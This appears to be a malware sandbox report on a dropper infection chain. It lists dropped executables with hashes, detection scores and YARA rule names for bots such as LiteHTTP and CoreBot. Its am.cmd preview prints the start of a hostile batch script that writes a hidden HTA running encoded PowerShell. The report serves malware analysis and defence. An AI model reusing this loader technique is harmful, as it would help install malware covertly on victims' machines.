                                                                                                                                                                                                                        Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                        MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                        SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                        SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`..................................O..O....`..............................(O..8............................................ ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................O......H........-..`!...........................................................0..8.......s......(....}......}......}.....|......(...+.|....(....*.0...........(......s...... ...o.....+..*...0..\........s.......o......(....o....o....o .....r...po!......("...&...&.r...prm..p...(#...&....($....*......1..<.......0..1.......s......(....}......}.....|......(...+.|....(....*....0..V...........(.....ry..p.(%......(&...&r...p.r...p('...((..........r...p.o)...(*...((.........*.........."8..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1787
                                                                                                                                                                                                                        Entropy (8bit):5.366940737845822
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:SfNaoQdXTEQdWfNaoQ0QPfNaoQBQTfNaoQqd+0UrU0U8Qqw:6NnQdTEQ4NnQ0QnNnQBQLNnQN0UrU0U5
                                                                                                                                                                                                                        MD5:2A9A8BA89AB36648791D41814C39B210
                                                                                                                                                                                                                        SHA1:1CCE340BBBF327AE7B53F91A197BC24A29800E19
                                                                                                                                                                                                                        SHA-256:4F2062B96868665126365FF20C7528C705667F27AF08BF759C1288B4E28076F4
                                                                                                                                                                                                                        SHA-512:104693949FD75E98A1BC60BC7041421B31FA515FB963042C57EA98F6CF2487996D07686D8085B17C9896CA908B36EA10FAEF0D6A58F4107AB25959EA8998190C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/6FB31D3CACE220E185FF385B15D22302",.. "id": "6FB31D3CACE220E185FF385B15D22302",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/6FB31D3CACE220E185FF385B15D22302"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtools/page/4244B4C0EF868DD963BA3D32FDAFC48A",.. "id": "4244B4C0EF868DD963BA3D32FDAFC48A",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/4244B4C0EF868DD963BA3D32FDAFC48A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9229/devtoo

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):950272
                                                                                                                                                                                                                        Entropy (8bit):7.942316948794619
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ED6ntLbuapyHDc1yc+Y0e2mX8T+5sQaw/oB:y6ntfLyRcR2+O+5sQasi
                                                                                                                                                                                                                        MD5:A8A4FE132737FED447D14E0247165ED7
                                                                                                                                                                                                                        SHA1:8AF15183B075BD12A070F78B1125516D79646A60
                                                                                                                                                                                                                        SHA-256:246A588619CBCBFD836FC1BF1815252455482FB51B49790424EA638BFD459AA8
                                                                                                                                                                                                                        SHA-512:6EAEDAF06B231A84EA08E786B8C707E07011FB9060147CE01DBADA5BAE95C62CC54DB965CC7FEFC83592381F7DDE494EFCA6C78D3C897835A9964C2A1581D6A2
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m....0.......................A...................................................................................... . . .......`..................@....rsrc........0.......p..............@....idata .....@.......r..............@... .P*..P.......t..............@...cywnalex....../......v..............@...reoqekwb......I......`..............@....taggant.0....I.."...d..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50265898
                                                                                                                                                                                                                        Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                        MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                        SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                        SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                        SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..................|............@..........................@............@.....................................d........]................... .........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....].......^..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1704448
                                                                                                                                                                                                                        Entropy (8bit):7.939378112820287
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:ACLkDxtWk5WtTj/JuiLWbUT5B+xLNNXTjbT+:RLkDxwk63/JVLqMS1fy
                                                                                                                                                                                                                        MD5:27998D2440B5A856ECA1795EABB8FA23
                                                                                                                                                                                                                        SHA1:62D063990224278662EBD3E54742C09C0ED74751
                                                                                                                                                                                                                        SHA-256:BB98AC0C1EF756EEE54726001008F52B498DD3C8575E190083674F52F33F3D9F
                                                                                                                                                                                                                        SHA-512:814EAB7721F0C0FDE983BF3956094847A1ED79E422AD8A6559A4A4266C9178D996B5341BE6CB20C2E62446001F89222E2D1F7AD7656EB793307AD9087B57A9BD
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M...,}..,}..,}..q~..,}..T..,}..,|..,}..qt..,}..q...,}.Rich.,}.........PE..L.....f.................`...........pC......p....@...........................C......>....@.................................a...u................................................................................................................... . .........@..................@....rsrc................P..............@....idata .............R..............@... . )..........T..............@...xuvnqsmj......)......V..............@...dkjxiybl.....`C.....................@....taggant.0...pC.."..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):15360
                                                                                                                                                                                                                        Entropy (8bit):5.03888709426846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:8dGRmTbW+eO9GXSrtx2MUyQ6JCgf61FDOVV:QzGXaff61FDO7
                                                                                                                                                                                                                        MD5:9BE5AC720DCF1838FD5A2D7352672F66
                                                                                                                                                                                                                        SHA1:D8046191A1D1756768A8BAD62CE3BA757DEB7D53
                                                                                                                                                                                                                        SHA-256:CC5EB5AC7CB599572A1C9747EFA83774221E0AD4A24ED6545D5BC03A44A23196
                                                                                                                                                                                                                        SHA-512:72F618868C9960332931D7055A4BFF5B3394979A1F5D8089D51C6DC436A121A3D9332D405A3EB3F65FCB8C5930C73606E194782FCF29B46D5E42235DE29ACC33
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..2...........P... ...`....@.. ....................................`..................................O..O....`..............................(O..8............................................ ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B.................O......H........-..`!...........................................................0..8.......s......(....}......}......}.....|......(...+.|....(....*.0...........(......s...... ...o.....+..*...0..\........s.......o......(....o....o....o .....r...po!......("...&...&.r...prm..p...(#...&....($....*......1..<.......0..1.......s......(....}......}.....|......(...+.|....(....*....0..V...........(.....ry..p.(%......(&...&r...p.r...p('...((..........r...p.o)...(*...((.........*.........."8..

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1026818021\am.cmd

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2798
                                                                                                                                                                                                                        Entropy (8bit):5.074542988652506
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:EouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:/u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                        MD5:D04672865C486B6AAD427C322064B30C
                                                                                                                                                                                                                        SHA1:23D3FD4C112365992E7D3E5E2A49B4C247C8A01D
                                                                                                                                                                                                                        SHA-256:BE97D5A0761863C214285693B8CE1938DF0FAD4AD4D2BDAB3667495EBCA2E826
                                                                                                                                                                                                                        SHA-512:28E6C968763EBEE2450ADDDEE9FA2A464C3499F7C9D6DE110C0CAB6F026A038BBA1A467D9842B9CA9FF92B726B760EE2D8758BF4C0B53D52F309A3AFAB7D3D09
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:.@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%64%%65%%6e%

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50265898
                                                                                                                                                                                                                        Entropy (8bit):7.999674698414995
                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                        SSDEEP:786432:iVfnIqg/4eDeagYxzk6IdjqnDlK4Z6cZKXV1PGQYAka8UGBBFi17KhVX2lfw0PaU:iVTg/44gYxzPIxeDlEcZeVMa8U6Bhxm1
                                                                                                                                                                                                                        MD5:26F7294CA7A10C65B44057525A233636
                                                                                                                                                                                                                        SHA1:59A5C0438745C24350DFF1D05726D85B2F5DB394
                                                                                                                                                                                                                        SHA-256:57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A
                                                                                                                                                                                                                        SHA-512:C73B7161A925D8438F8B31D7E04FB3FEC4DBFCD2A22B52C9C0CC3DA77B6DA3417351C076A28D601D06346B947042EF1715865CA358CB20BBFC7EFCFF9332E440
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].N... ... ... ..m... ..m... ..m... .".#... .".%... .".$... ...... ...!.m. ...$... ...... ..."... .Rich.. .................PE..L......^.........."..................|............@..........................@............@.....................................d........]................... .........................................@............................................text............................... ..`.rdata..............................@..@.data...............................@....gfids..............................@..@.rsrc....].......^..................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50688
                                                                                                                                                                                                                        Entropy (8bit):5.493299313766064
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:5tVM5LJ25oHc0C+2TkA0fjmExIBbcN3EUrr:5t0J21mj6bcN3EUrr
                                                                                                                                                                                                                        MD5:18C31E671DEA37E27E89CA09A83B73D5
                                                                                                                                                                                                                        SHA1:31A7920C83DC371AFEE48098093E5BEDD4017290
                                                                                                                                                                                                                        SHA-256:2269441328D08D17CBBA18F7AEFE172128700D428AF38D209F3D1FE8D3FCBC3E
                                                                                                                                                                                                                        SHA-512:C6400F2FBD60B7E2DD8F5ADAF08347DD21487B7DB9B10EAC09AB2A7135789E2D36C3F63BFD117DA773B968EE8AB31226AEFCC944B5F59458760BF76D358CE676
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_LiteHTTPBot, Description: Yara detected LiteHTTP Bot, Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Author: Joe Security
                                                                                                                                                                                                                        • Rule: MALWARE_Win_CoreBot, Description: Detects CoreBot, Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, Author: ditekSHen
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.rg..............0.............j.... ........@.. ....................... ............`.....................................O.......$............................................................................ ............... ..H............text...p.... ...................... ..`.rsrc...$...........................@..@.reloc..............................@..B................L.......H........h...m...........................................................0..8.......s<.....(....}......}......}.....|......(...+.|....(....*.0..................s]..........sa..........se...(7...&(.....(.......(.....(.....(....-.r...p+.r...p.(.....(.....(......(.........Q...%.r...p.%..(.....%.r...p.%..(.....%.r)..p.%..(.....%.r3..p.%..(.....%.r=..p.%....(.....%..rG..p.%....(.....%..rQ..p.%..~....(.....%..r[..p.%..~....(.....(......~......(....(........re..p(........9.......rm.

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1027024001\am.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):93696
                                                                                                                                                                                                                        Entropy (8bit):6.742682621521483
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfEwb3BOp:77DhdC6kzWypvaQ0FxyNTBfEB
                                                                                                                                                                                                                        MD5:C821E7D7DAC978E7D5E8F35B0FE2AF88
                                                                                                                                                                                                                        SHA1:F19B8F64D6B6538F9E91F0DD5B67EDD39225B811
                                                                                                                                                                                                                        SHA-256:35EA0526EF247A229B7A5FFA6D23928FD25C4BCAAC41A34D7C735CC2A8746822
                                                                                                                                                                                                                        SHA-512:3E3BE988610BE6A6874176145969AD7C0C9E7935774803A62E594BFA4C96B2BAD795E3C77EA6958AA5E38F5B5545CF9629E74D909AA5E00FCA7F78A2013F68EC
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\1027024001\am.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 45%
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....V...............0....@.........................................................................lq......................................................................................pt..<............................code...~8.......:.................. ..`.text...b....P.......>.............. ..`.rdata...3...0...4..................@..@.data........p.......L..............@....rsrc................^..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2013088
                                                                                                                                                                                                                        Entropy (8bit):6.068687396136205
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:4U77L3RZgH96z4S/zCtTFL/LcfQnolkbe7yFH3HtDg8VG:4U77L3RZo6/EFPQQny77I3N3VG
                                                                                                                                                                                                                        MD5:19861D67B2811D6EB3BE1951B28703AE
                                                                                                                                                                                                                        SHA1:FCE3CDCFC4067AF2451D638E99BB1EDE113C29B8
                                                                                                                                                                                                                        SHA-256:7B8526752F7A9580FC6EE88C35C8DF39EF69BA1AB4241BBA1FAD1FB44C80A7A5
                                                                                                                                                                                                                        SHA-512:D13EAC3F7E498217973DC153645FBEFDE3D281B8BE0B4EEC8B1C757948581A5BFA6E4EDF67A73B25AA2AC59895E20A8E94C4573BCAB92244A149405927230890
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..d....}.O..........#............................@.............................0......Bt.......................................................S...........V.............. 3...........................................................................................text...0........................... ..`.rdata...Z.......\..................@..@.data....0...p.......R..............@....pdata...............^..............@..@.rsrc....V.......X...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1027368001\36ac23ea9d.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):950272
                                                                                                                                                                                                                        Entropy (8bit):7.942316948794619
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24576:ED6ntLbuapyHDc1yc+Y0e2mX8T+5sQaw/oB:y6ntfLyRcR2+O+5sQasi
                                                                                                                                                                                                                        MD5:A8A4FE132737FED447D14E0247165ED7
                                                                                                                                                                                                                        SHA1:8AF15183B075BD12A070F78B1125516D79646A60
                                                                                                                                                                                                                        SHA-256:246A588619CBCBFD836FC1BF1815252455482FB51B49790424EA638BFD459AA8
                                                                                                                                                                                                                        SHA-512:6EAEDAF06B231A84EA08E786B8C707E07011FB9060147CE01DBADA5BAE95C62CC54DB965CC7FEFC83592381F7DDE494EFCA6C78D3C897835A9964C2A1581D6A2
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................I...........@...........................I...........@.................................Y@..m....0.......................A...................................................................................... . . .......`..................@....rsrc........0.......p..............@....idata .....@.......r..............@... .P*..P.......t..............@...cywnalex....../......v..............@...reoqekwb......I......`..............@....taggant.0....I.."...d..............@...................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\5EfYBe3nch.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):3243520
                                                                                                                                                                                                                        Entropy (8bit):6.653095926618001
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:XHBOv6ZdDjDDEs+I0m4b9GFmhQcIO9/Ajj8bgn+q:XHZj/Es+I0m4bEPA9ocgl
                                                                                                                                                                                                                        MD5:375CE25C0529862F6EE716A3E001BB0E
                                                                                                                                                                                                                        SHA1:1D299C953A9710C4FC307F239E0AFA3F04CC9BDC
                                                                                                                                                                                                                        SHA-256:57894BAD15F565875F04C8E489D07D18193DEEBD898BDF4A0481B4F7DCB08D07
                                                                                                                                                                                                                        SHA-512:0C16F1EE1E7668D3EBC0737D1C4939C1EDEDB1795FBAE79B4085F48C6C78256A75C7C9C89FB286968C9BF8DDC918E9227EBFCE528143747D9A72931280188535
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....~.1...@.................................W...k...........................4o1..............................n1..................................................... . ............................@....rsrc...............................@....idata ............................@...tezivoqu..*.......*.................@...tcaewlrx.....p1......X1.............@....taggant.0....1.."...\1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\5EfYBe3nch.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):5163520
                                                                                                                                                                                                                        Entropy (8bit):5.4946130440701735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:49152:HipKOwbwA2wD0syvv+YhXCa67ST5f2jN9/jfHoO5aK:HipKpbwA2wD0syvv+YAamaf2bjPo1K
                                                                                                                                                                                                                        MD5:8AFA0085DF245EA0BE67A6A4BABA228D
                                                                                                                                                                                                                        SHA1:2A3975A72E0F1C25996DEA887C05E074D47FEB91
                                                                                                                                                                                                                        SHA-256:EBAC10E74C49DC6B424AC678DCDD349D4291BEDAADDDCE1ABBC080E10B285BD9
